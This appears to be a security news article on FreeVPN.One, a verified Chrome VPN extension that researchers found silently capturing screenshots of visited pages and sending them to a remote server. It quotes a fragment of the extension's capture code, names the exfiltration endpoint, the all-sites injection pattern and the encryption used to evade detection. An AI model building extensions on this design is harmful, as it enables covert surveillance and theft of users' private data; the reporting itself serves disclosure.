A Chrome VPN extension with over 100,000 installations and verified badge status has been discovered operating as sophisticated spyware, continuously capturing user screenshots and exfiltrating sensitive data without consent.
The extension, known as FreeVPN.One, masqueraded as a legitimate privacy tool while secretly implementing comprehensive surveillance capabilities that directly contradict its stated privacy promises.
.webp "Legitimate Chrome VPN With 100,000+ Installs Silently Captures Screenshots and Exfiltrate Sensitive Data 2")
The malicious extension gained prominence through Google’s Chrome Web Store, achieving featured placement and verified status despite implementing backdoor functionality that captures screenshots of every webpage users visit.
Operating under the guise of providing privacy protection, the extension employs a deceptive two-stage architecture that silently monitors user activity across all browsing sessions, capturing sensitive information including banking credentials, personal communications, and private documents.
.webp "Legitimate Chrome VPN With 100,000+ Installs Silently Captures Screenshots and Exfiltrate Sensitive Data 4")
Koi.Security analysts noted that the extension’s evolution from legitimate VPN service to spyware occurred through a series of calculated updates beginning in April 2025, when developers introduced broad permissions that enabled comprehensive data collection capabilities.
.webp "Legitimate Chrome VPN With 100,000+ Installs Silently Captures Screenshots and Exfiltrate Sensitive Data 5")
Security researchers identified the transformation as particularly concerning, given the extension’s verified status and widespread adoption among privacy-conscious users.
The surveillance campaign impacts users globally, with captured screenshots containing sensitive corporate data, financial information, and personal communications being transmitted to remote servers controlled by the threat actors.
The extension’s privileged position within users’ browsers enables unrestricted access to all browsing activity, creating a comprehensive intelligence-gathering operation that operates entirely without user knowledge or consent.
Technical Implementation and Evasion Mechanisms
The extension implements its surveillance capabilities through a sophisticated content script injection system that automatically deploys across all HTTP and HTTPS websites using the broad matches: ["http://*/*", "https://*/*"] pattern.
Upon page load initialization, the malicious code executes a precisely timed delay mechanism:-
setTimeout(() => {
chrome.runtime.sendMessage({action: 'captureViewport'});
}, 1100);This code waits exactly 1.1 seconds after page initialization before triggering screenshot capture, ensuring complete page rendering for maximum data quality.
.webp "Legitimate Chrome VPN With 100,000+ Installs Silently Captures Screenshots and Exfiltrate Sensitive Data 6")
The background service worker receives the captureViewport message and executes actual screenshot capture using Chrome’s privileged chrome.tabs.captureVisibleTab() API, automatically transmitting captured images to aitd[.]one/brange.php alongside page URLs, tab identifiers, and unique user tracking codes.
Recent versions implement AES-256-GCM encryption with RSA key wrapping to obfuscate data transmission, making network-based detection significantly more challenging.
The encryption layer masks the continuous screenshot exfiltration while maintaining the extension’s surveillance capabilities, demonstrating the threat actors’ commitment to persistence and detection evasion.
The extension’s permission structure requires tabs, and scripting permissions, creating a comprehensive surveillance framework that extends far beyond legitimate VPN functionality requirements and enables complete user activity monitoring.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
